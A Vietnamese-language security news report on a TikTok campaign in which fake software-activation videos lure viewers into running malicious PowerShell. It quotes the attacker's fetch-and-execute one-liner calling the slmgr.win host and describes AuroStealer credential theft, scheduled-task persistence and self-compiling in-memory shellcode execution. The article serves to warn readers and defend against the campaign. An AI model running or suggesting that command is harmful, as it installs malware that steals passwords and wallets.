Các chuyên gia bảo mật vừa phát hiện một chiến dịch tấn công mạng khai thác sự lan truyền mạnh mẽ của TikTok, dùng các video hướng dẫn kích hoạt phần mềm giả mạo để lừa người dùng chạy mã PowerShell độc hại. Phương thức tấn công này sử dụng mã độc tự biên dịch và thực thi hoàn toàn trong bộ nhớ, gây khó khăn cho các công cụ phân tích và bảo mật.
Hoạt động lừa đảo này đang lợi dụng sự phổ biến của nền tảng video ngắn TikTok. Kẻ tấn công tạo ra các clip hướng dẫn “cách kích hoạt miễn phí” các phần mềm có bản quyền như Adobe Photoshop hoặc Microsoft Office/Windows.
Trong một video phổ biến, kẻ tấn công yêu cầu người xem mở cửa sổ PowerShell với quyền quản trị và thực hiện một dòng lệnh đơn giản: powershell iex (irm slmgr.win/photoshop). Dòng lệnh này sử dụng Invoke-Expression (iex) để tải và chạy một script độc hại từ máy chủ của kẻ tấn công thông qua Invoke-RestMethod (irm).
Kỹ thuật này tương tự với kịch bản ClickFix đã được ghi nhận trước đây, nơi người dùng bị lừa nhấp vào và thực thi các đoạn mã nguy hiểm trên các trang web uy tín.
Khi người dùng thực thi lệnh, script PowerShell ban đầu sẽ tải xuống giai đoạn tiếp theo, một tệp nhị phân có tên Updater.exe. Phân tích cho thấy đây chính là AuroStealer, một Trojan chuyên thu thập thông tin đăng nhập. Mã độc này được biết đến với khả năng đánh cắp mật khẩu đã lưu trên trình duyệt và thông tin ví tiền điện tử.
Để đảm bảo duy trì quyền truy cập (persistence), script PowerShell sẽ tạo một Scheduled Task trên hệ thống. Tên của tác vụ này được chọn ngẫu nhiên từ một danh sách các tên hợp pháp (ví dụ: AdobeUpdateTask hoặc WindowsUpdateCheck), giúp mã độc hòa lẫn vào các hành vi thông thường của hệ thống và tránh bị phát hiện. Tác vụ được thiết lập để khởi chạy Updater.exe mỗi khi người dùng đăng nhập.
Điểm đáng chú ý của chiến dịch là việc sử dụng một payload tiếp theo có tên source.exe sau khi AuroStealer được triển khai. Tệp nhị phân này sử dụng kỹ thuật mã độc self-compiling malware tiên tiến.
Trong quá trình chạy, source.exe gọi trình biên dịch .NET csc.exe để biên dịch mã nguồn được lưu trong một tệp tạm thời. Lớp được biên dịch này chứa các khai báo P/Invoke (Platform Invoke) tới các hàm Windows API như VirtualAlloc, CreateThread và WaitForSingleObject.
Cơ chế này cho phép mã độc: Cấp phát bộ nhớ, * Inject shellcode trực tiếp vào tiến trình, Tạo thread để thực thi payload. Thực thi hoàn toàn trong bộ nhớ (in-memory execution) mà không cần ghi tệp mã độc cuối cùng xuống ổ đĩa.
Việc biên dịch theo yêu cầu này làm phức tạp hóa quá trình phân tích tĩnh và các giải pháp bảo mật truyền thống, vì mã độc cuối cùng chỉ tồn tại trong bộ nhớ tạm thời và dễ bay hơi.
Hoạt động này nhấn mạnh sự thay đổi chiến thuật của tội phạm mạng, khi họ kết hợp các kênh phân phối mới (video ngắn) với các kỹ thuật chống phân tích tinh vi như mã độc tự biên dịch và thực thi trong bộ nhớ. Các chuyên gia khuyến cáo người dùng tuyệt đối không chạy các lệnh terminal hoặc PowerShell từ các nguồn không xác minh và các nền tảng nên xem xét việc cảnh báo người dùng khi có nội dung khuyến khích thực hiện các thao tác nguy hiểm tiềm tàng.
